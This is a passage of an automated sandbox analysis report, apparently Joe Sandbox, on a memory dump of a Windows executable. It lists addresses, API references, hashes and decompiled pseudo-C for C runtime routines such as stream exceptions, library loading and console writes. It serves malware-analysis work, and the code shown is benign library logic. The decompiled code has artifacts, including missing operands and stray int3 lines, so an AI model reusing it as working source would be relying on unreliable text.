0x00423ac5
0x00423ac8
0x00423acb
0x00423ad2
0x00423ad7
0x00423aef
0x00423af2
0x00423af2
0x00423af5
0x00423af8
0x00423af9
0x00423afa
0x00423afa
0x00423afb
0x00423b0e
0x00423b15
0x00423b1a
0x00000000
0x00423b1a
0x00423ad9
0x00423adc
0x00423ade
0x00423ae4
0x00423ae4
0x00423ae6
0x00423ae7
0x00423ae7
0x00423a5b
0x00423a5b
0x00423a5d
0x00000000
0x00423a5d
0x00423ae0
0x00423ae2
0x00000000
0x00000000
0x00000000
0x00423ae2
0x00423a91
0x00423a94
0x00423a9b
0x00423aa2
0x00423aa5
0x00423aa7
0x00000000
0x00000000
0x00423ab0
0x00423ab3
0x00423ab5
0x00000000
0x00000000
0x00423ab7
0x00000000
0x00423ab7
0x00423a96
0x00423a99
0x00000000
0x00000000
0x00000000
0x00423a99
0x00000000
0x00423a80
0x00423a19
0x00423a1c
0x00000000
0x00000000
0x00423a1e
0x00423a38
0x00423a3e
0x00423a42
0x00423a45
0x00423a47
0x00000000
0x00000000
0x00423a4d
0x00423a50
0x00423a52
0x00423a58
0x00423a58
0x00423a5a
0x00000000
0x00423a5a
0x00423a54
0x00423a56
0x00000000
0x00000000
0x00000000
0x00423a56
0x004239f7
0x004239fa
0x004239fd
0x004239fe
0x00000000
0x004239be
0x00000000
0x004239c1

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423AFB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423B0E

Strings

99B, xrefs: 00423A04
99B, xrefs: 004239E2

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 99B$99B
API String ID: 885266447-862792131
Opcode ID: fb1fee3e0c56fe8e9cde052c79b43c72f641b9244b6fad5d831a619671f24cc1
Instruction ID: b02a6e7cbcacb517213776693aab9805db623b7f4d60859a31f81b5ed3266605
Opcode Fuzzy Hash: fb1fee3e0c56fe8e9cde052c79b43c72f641b9244b6fad5d831a619671f24cc1
Instruction Fuzzy Hash: F951B271B00259AFCF14CF98D881AAEBBB2EF48311F54806AF89597351D3389E42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00403A00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00403A00(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				intOrPtr _v48;
				signed int _t20;
				void* _t23;
				void* _t33;
				signed char _t36;
				intOrPtr* _t37;
				intOrPtr* _t40;
				char* _t45;
				intOrPtr _t46;

				_t33 = __ebx;
				_t20 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t20;
				_t36 =  *(__ecx + 0x10) & _t20;
				if(_t36 == 0) {
					return _t20;
				} else {
					if(_a8 != 0) {
						E00414B7B(0, 0);
					}
					if((_t36 & 0x00000004) == 0) {
						_t45 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t45 = "ios_base::badbit set";
					}
					_t23 = E00402FB0( &_v32, 1);
					_t37 =  &_v24;
					_push(_t23);
					E00403910(_t33, _t37, _t45);
					E00414B7B( &_v32, 0x4422f0);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t45);
					_t46 = _v48;
					asm("xorps xmm0, xmm0");
					_t40 = _t37;
					 *_t40 = 0x433244;
					asm("movq [eax], xmm0");
					E00414631(_t46 + 4, _t40 + 4);
					 *_t40 = 0x43459c;
					 *((intOrPtr*)(_t40 + 0xc)) =  *((intOrPtr*)(_t46 + 0xc));
					 *((intOrPtr*)(_t40 + 0x10)) =  *((intOrPtr*)(_t46 + 0x10));
					 *_t40 = 0x4345d0;
					return _t40;
				}
			}

0x00403a00
0x00403a0c
0x00403a0f
0x00403a16
0x00403a18
0x00403a26
0x00403a1a
0x00403a1e
0x00403a2d
0x00403a2d
0x00403a35
0x00403a4b
0x00403a37
0x00403a37
0x00403a37
0x00403a55
0x00403a5d
0x00403a61
0x00403a63
0x00403a72
0x00403a77
0x00403a78
0x00403a79
0x00403a7a
0x00403a7b
0x00403a7c
0x00403a7d
0x00403a7e
0x00403a7f
0x00403a83
0x00403a84
0x00403a87
0x00403a8b
0x00403a91
0x00403a97
0x00403a9f
0x00403aa4
0x00403ab3
0x00403ab8
0x00403abb
0x00403ac4
0x00403ac4

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403A9F

Part of subcall function 00414B7B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,004123EF,?,00441908,00402904,string too long,00402904,?,?,?), ref: 00414BDB

Strings

ios_base::eofbit set, xrefs: 00403A46
ios_base::badbit set, xrefs: 00403A37, 00403A62, 00403A83
ios_base::failbit set, xrefs: 00403938, 00403A41

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: efa896197464d988a22a4665368f36291d2b7245f706ea407db39219bc463d9f
Instruction ID: 5ca9c8b6697ae70dd92285cccf55e05d5f07217f2c4b3bb58837881ace8174e9
Opcode Fuzzy Hash: efa896197464d988a22a4665368f36291d2b7245f706ea407db39219bc463d9f
Instruction Fuzzy Hash: E71124B2A103046BC710DE59C801BD6B7ECAF49311F14892BFA58A76C1F778EA54CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00417B42 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00417B42(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00420218(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x00417b4f
0x00417b57
0x00417b8c
0x00417b59
0x00417b62
0x00000000
0x00417b89
0x00417b88
0x00417b88

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00417AF3,00000000,?,004447D4,?,?,?,00417C96,00000004,InitializeCriticalSectionEx,00435170,InitializeCriticalSectionEx), ref: 00417B4F
GetLastError.KERNEL32(?,00417AF3,00000000,?,004447D4,?,?,?,00417C96,00000004,InitializeCriticalSectionEx,00435170,InitializeCriticalSectionEx,00000000,?,00417A4D), ref: 00417B59
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00417B81

Strings

api-ms-, xrefs: 00417B66

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 286c89d422db71c697f3237b2d49fb5709d2675eb0362af91fcace01508841d4
Instruction ID: 8af73c1b971d03717dcad23543ed2b47545356c011706117da99b8513980ac08
Opcode Fuzzy Hash: 286c89d422db71c697f3237b2d49fb5709d2675eb0362af91fcace01508841d4
Instruction Fuzzy Hash: EFE048307C8205B7DF101F61EC47F993F749B00B56F104032F90CA85E1E769A99495DC

Uniqueness

Uniqueness Score: -1.00%

Function 00420E68 Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00420E68(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x432780);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x443048; // 0x35200185
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x444b30 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E0041A250(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x444b30 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x444b30 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x444b30 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00422AF7(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00422AF7(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x4432d0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x444b30 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E0042C34C( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x4432d0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x444b30 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E00414BF0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x444b30 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E0042C34C( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00427D31(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E0041361E(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x00420e6d
0x00420e6f
0x00420e7a
0x00420e7b
0x00420e7e
0x00420e83
0x00420e85
0x00420e8b
0x00420e8f
0x00420e95
0x00420e9a
0x00420ea0
0x00420ea3
0x00420ea6
0x00420ea9
0x00420eac
0x00420eaf
0x00420eb9
0x00420ec0
0x00420ec8
0x00420ecb
0x00420ed1
0x00420ed5
0x00420ed8
0x00420edc
0x00420edc
0x00420ee4
0x00420eec
0x00420ef1
0x00420ef2
0x00420ef3
0x00420ef4
0x00420ef7
0x00420ef9
0x00420eff
0x00420f05
0x00420f08
0x00420f0a
0x00420f0d
0x00420f16
0x00420f1c
0x00420f1f
0x00420f26
0x00420f2d
0x00420f30
0x0042106a
0x0042106e
0x00421071
0x00421094
0x0042109a
0x0042109c
0x004210a0
0x004210d1
0x004210d4
0x004210d6
0x00000000
0x004210a2
0x004210a2
0x004210a5
0x004210a8
0x004210ab
0x004211f5
0x00421203
0x0042120c
0x004210b1
0x004210bb
0x004210c0
0x004210c3
0x004210c6
0x004210cc
0x00000000
0x004210cc
0x004210c6
0x004210ab
0x00421073
0x0042107a
0x0042107d
0x00421080
0x00421082
0x00421085
0x0042108c
0x0042108e
0x004210d7
0x004210da
0x004210db
0x004210e0
0x004210e3
0x004210e6
0x004210ec
0x00000000
0x004210ec
0x004210e6
0x00420f36
0x00420f39
0x00420f3b
0x00420f3d
0x00420f41
0x00420f42
0x00420f46
0x00000000
0x00000000
0x00000000
0x00420f46
0x00420f4b
0x00420f4d
0x00420f52
0x00421012
0x00421019
0x0042101a
0x0042101d
0x0042101f
0x004211cf
0x004211d1
0x00000000
0x004211d3
0x004211d3
0x004211d6
0x004211e5
0x004211e9
0x004211ea
0x004211ea
0x00000000
0x004211ee
0x00000000
0x00421025
0x0042102a
0x0042102d
0x00421030
0x00421036
0x0042103f
0x0042104a
0x0042104f
0x00421052
0x00421055
0x0042105e
0x0042105e
0x00421061
0x00000000
0x00421061
0x00421055
0x00420f58
0x00420f5b
0x00420f61
0x00420f63
0x00420f70
0x00420f71
0x00420f74
0x00420f77
0x00420f7c
0x004211a0
0x004211a2
0x004211a4
0x004211a7
0x004211aa
0x004211b6
0x004211b9
0x004211bb
0x004211bc
0x004211c0
0x004211c3
0x004211c3
0x004211c7
0x004211c7
0x004211c7
0x004211ca
0x004211ca
0x00420f82
0x00420f82
0x00420f85
0x00420f87
0x00420f8a
0x00420f8c
0x00420f90
0x00420f91
0x00420f92
0x00420f96
0x00420f9b
0x00420fa5
0x00420faa
0x00420fad
0x00420fad
0x00420fb0
0x00420fb3
0x00420fb5
0x00420fb8
0x00420fc1
0x00420fc5
0x00420fc6
0x00420fcd
0x00420fd3
0x00420fdb
0x00420fe6
0x00420feb
0x00420ff6
0x00420ffb
0x00421001
0x0042100a
0x00421064
0x00421064
0x004210ef
0x004210f4
0x00421106
0x0042110b
0x0042110e
0x00421113
0x0042112e
0x00421211
0x00421217
0x00421134
0x00421134
0x0042113f
0x00421141
0x00421144
0x0042114d
0x00421157
0x00000000
0x00421159
0x0042115b
0x0042115d
0x00421176
0x00000000
0x0042117c
0x00421180
0x00421186
0x00421189
0x0042118f
0x00421192
0x00000000
0x00421192
0x00421180
0x00421176
0x00421157
0x0042114d
0x0042112e
0x00421113
0x00421001
0x00420f7c
0x00420f52
0x00000000
0x00421195
0x00421195
0x0042119e
0x00421219
0x0042121e
0x00421226
0x00421227
0x00421228
0x00421234
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(35200185,00000000,00000000,00000000), ref: 00420ECB

Part of subcall function 00427D31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004264E6,?,00000000,-00000008), ref: 00427DDD

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00421126
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0042116E
GetLastError.KERNEL32 ref: 00421211

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 04bb50d0fb26d342604141d89ce82b31cf1c6f824e0d630eefade663fa0d639f
Instruction ID: ac4cfe10a7d27ed62ff7de5ddb6cd96f2af41a5dc5bcf9134081d331438b7029
Opcode Fuzzy Hash: 04bb50d0fb26d342604141d89ce82b31cf1c6f824e0d630eefade663fa0d639f
Instruction Fuzzy Hash: 69D19975E002689FCF15CFE8E880AADBBB4FF49304F58416AE815E7352D734A942CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042814D Relevance: 6.1, APIs: 4, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042814D(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E00427D31(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E0041D3BA(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E0041C9F9(GetLastError());
									_t20 =  *((intOrPtr*)(E0041CA53()));
								}
								L14:
								return _t20;
							}
							_t20 = E004286EF(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0041C9F9(GetLastError());
						return  *((intOrPtr*)(E0041CA53()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E004286EF(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E0041D3DE(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}

0x00428154
0x00428159
0x00428177
0x00428179
0x0042817c
0x004281a5
0x004281ad
0x004281af
0x004281c8
0x004281cb
0x004281ce
0x004281dc
0x004281e9
0x004281ee
0x004281f0
0x00428209
0x0042820c
0x0042820c
0x004281f2
0x004281f9
0x00428204
0x00428204
0x0042820e
0x00000000
0x0042820e
0x004281d3
0x004281d8
0x004281da
0x00000000
0x00000000
0x00000000
0x004281da
0x004281b8
0x00000000
0x004281c3
0x0042817e
0x00428181
0x00428184
0x00428193
0x00428196
0x0042816d
0x0042816d
0x00000000
0x00428170
0x0042818a
0x0042818f
0x00428191
0x00428212
0x00428212
0x00000000
0x00428191
0x0042815b
0x00428160
0x00428165
0x00428167
0x0042816a
0x00000000

APIs

Part of subcall function 00427D31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004264E6,?,00000000,-00000008), ref: 00427DDD

GetLastError.KERNEL32 ref: 004281B1
__dosmaperr.LIBCMT ref: 004281B8
GetLastError.KERNEL32(?,?,?,?), ref: 004281F2
__dosmaperr.LIBCMT ref: 004281F9

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 92193438e69e4416bd4c92fd64385e6247f7db12395fc2a69cb738ac0504b02b
Instruction ID: d132d1f158b9c44ea61a86f1543b5f475bcbec393d0dc6344fa18f1be3475fee
Opcode Fuzzy Hash: 92193438e69e4416bd4c92fd64385e6247f7db12395fc2a69cb738ac0504b02b
Instruction Fuzzy Hash: 6721FB71701625AF9B10AF66EC80D6F77A9FF10354740855FF82993690DF38EC5187A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041D2DB Relevance: 6.1, APIs: 4, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D2DB(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E00427D31(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E0041D3BA(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E0041C9F9(GetLastError());
									_t18 =  *((intOrPtr*)(E0041CA53()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E0041D3F8(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0041C9F9(GetLastError());
						_t18 =  *((intOrPtr*)(E0041CA53()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E0041D3F8(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0041D47D(_a8);
				return 0;
			}

0x0041d2e1
0x0041d2e6
0x0041d2fd
0x0041d32f
0x0041d339
0x0041d352
0x0041d358
0x0041d366
0x0041d373
0x0041d37a
0x0041d393
0x0041d396
0x0041d37c
0x0041d383
0x0041d38e
0x0041d38e
0x0041d398
0x0041d399
0x00000000
0x0041d399
0x0041d35d
0x0041d364
0x00000000
0x00000000
0x00000000
0x0041d364
0x0041d342
0x0041d34d
0x00000000
0x0041d34d
0x0041d2ff
0x0041d305
0x0041d318
0x0041d31b
0x0041d31d
0x0041d31f
0x00000000
0x0041d31f
0x0041d30b
0x0041d312
0x00000000
0x00000000
0x00000000
0x0041d312
0x0041d2eb
0x00000000

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed6135ce67b36efedd41668e1190843f3a5ab02d88d439b7d257a1dc773afb11
Instruction ID: b554e473e5976ea2b9ee6ea0b56a9bc1c1e4299f9a8d405d354e242d1bce65e7
Opcode Fuzzy Hash: ed6135ce67b36efedd41668e1190843f3a5ab02d88d439b7d257a1dc773afb11
Instruction Fuzzy Hash: C621D7F1A0060DAFCB14AF669C809EB77A8EF44359701451BFC38D7651D738EC8087AA

Uniqueness

Uniqueness Score: -1.00%

Function 004290E3 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E004290E3() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E004290AC(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E00427D31(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t26 = E00421D39(_t9);
						_push(0);
						if(_t26 != 0) {
